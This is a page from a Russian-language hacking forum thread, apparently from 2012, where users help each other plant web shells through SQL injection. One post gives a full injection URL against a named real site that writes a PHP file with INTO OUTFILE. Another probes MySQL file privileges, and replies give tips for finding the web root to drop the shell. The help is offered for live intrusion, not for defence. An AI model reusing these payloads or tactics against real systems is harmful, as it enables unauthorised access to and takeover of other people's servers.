HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2056 из 2438 « Первая < 10561556195620062046 2052 2053 2054 2055 2056 2057 2058 2059 2060 206621062156 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #20551  
Старый 01.05.2012, 06:27
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от heJiZzZ  
heJiZzZ said:
Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
Чаще:

/etc/conf/httpd/httpd.conf
 
Ответить с цитированием

  #20552  
Старый 01.05.2012, 12:52
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568

Репутация: 1
По умолчанию
Пытаюсь залить шелл средствами MySQL след. образом:

Цитата:
Сообщение от None  
http://www.jcbi.ru/obzor/obzor.php?id=181-9.999+union+select+"",2,3,4,5,6,7,8,9+INTO+OUTFILE +"/var/www/html/jcbi/docs/c.php"+--
Выдает такую ошибку:

Цитата:
Сообщение от None  
Error!
SELECT * FROM bazes WHERE baze_id=181-9.999 union select "",2,3,4,5,6,7,8,9 INTO OUTFILE "/var/www/html/jcbi/docs/c.php" --
Путь /var/www/html/jcbi/docs/ точно существует.

Помогите, пожалуйста, разобраться.
 
Ответить с цитированием

  #20553  
Старый 01.05.2012, 13:14
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568

Репутация: 1
По умолчанию
Т.е вот так нужно проверять?

Цитата:
Сообщение от None  
http://www.jcbi.ru/obzor/obzor.php?id=181-9.999+union+select+File_Priv,2,3,4,5,6,7,8,9+from+ mysql.user--
Там такая же ошибка вылазит...

Кстати, подскажите, что значит вот это: ""?

Почему именно параметр 'cmd'?
 
Ответить с цитированием

  #20554  
Старый 01.05.2012, 13:32
mironich
Guest
Сообщений: n/a
Провел на форуме:
142623

Репутация: 19
По умолчанию
Цитата:
Сообщение от None  
Кстати, подскажите, что значит вот это: ""?
Да пофигу как называть)

Код переданный через cmd выполниться в системе.
 
Ответить с цитированием

  #20555  
Старый 01.05.2012, 13:34
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от mironich  
mironich said:
Да пофигу как называть)
Код переданный через cmd выполниться в системе.
Ага, только щас system() не в моде, через него php-код не выполнишь(в некоторых случаях эта ф-я даже отключена).
 
Ответить с цитированием

  #20556  
Старый 01.05.2012, 14:12
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568

Репутация: 1
По умолчанию
Ну вот получу я шелл вида: site.ru/shell.php?cmd=phpinfo() и что дальше?

Цитата:
Сообщение от Ereee  
Ereee said:
Ага, только щас system() не в моде, через него php-код не выполнишь(в некоторых случаях эта ф-я даже отключена).
Что в моде?) Через админку только?
 
Ответить с цитированием

  #20557  
Старый 01.05.2012, 14:59
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию
Цитата:
Сообщение от skier529  
skier529 said:
Ну вот получу я шелл вида: site.ru/shell.php?cmd=phpinfo() и что дальше?
/thread191917-easy+shell.html
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #20558  
Старый 01.05.2012, 18:56
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568

Репутация: 1
По умолчанию
И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла.

Просто на глаза ничего подобного еще не попадалось.
 
Ответить с цитированием

  #20559  
Старый 01.05.2012, 19:10
mironich
Guest
Сообщений: n/a
Провел на форуме:
142623

Репутация: 19
По умолчанию
Цитата:
Сообщение от skier529  
skier529 said:
И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла.
Просто на глаза ничего подобного еще не попадалось.
Исчи баги с раскрытием пути под твой двиг, попробуй вызвать ошибку, глянь мб errrorlog криво лежит, пройдись гуглом по сайту.
 
Ответить с цитированием

  #20560  
Старый 01.05.2012, 19:10
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию
Цитата:
Сообщение от skier529  
skier529 said:
И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла.
Просто на глаза ничего подобного еще не попадалось.
Смотрите в сторону 'Path Disclosure'

раз

два
 
Ответить с цитированием
Ответ
Страница 2056 из 2438 « Первая < 10561556195620062046 2052 2053 2054 2055 2056 2057 2058 2059 2060 206621062156 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ